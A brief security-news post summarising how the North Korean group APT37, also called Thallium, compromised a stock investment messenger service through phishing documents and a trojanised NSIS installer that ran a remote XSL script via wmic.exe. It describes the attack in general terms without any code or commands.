Thallium, a chemical element of atomic number 81 is a soft silvery-white metal and is very poisonous.

The North Korean threat actor group APT37 is also known as Thallium. This threat group performed a cyberattack on a private stock investment messenger service in a software supply chain attack.

Their tactics and techniques consisted of a series of phishing attacks by using Microsoft Office documents to lure their victims. Thallium also sent infected Windows installers and macro-laden Office documents.

They did this by producing a malicious coded-infused Windows executable using Nullsoft Scriptable Install System (NSIS). It not only contained malicious code, but also real files from the stock investment application program.

Within the real installer, threat actors implemented specific commands that made a malicious XSL script from a rogue FTP server and executed it on Windows systems through a built-in wmic.exe utility.

Another supply chain attack is a cause for concern, given what has happened recently in the SolarWinds breach. The trail of connections to the specific victims opens up many lanes for threat actors to infiltrate.

Read more technical details on Thallium here.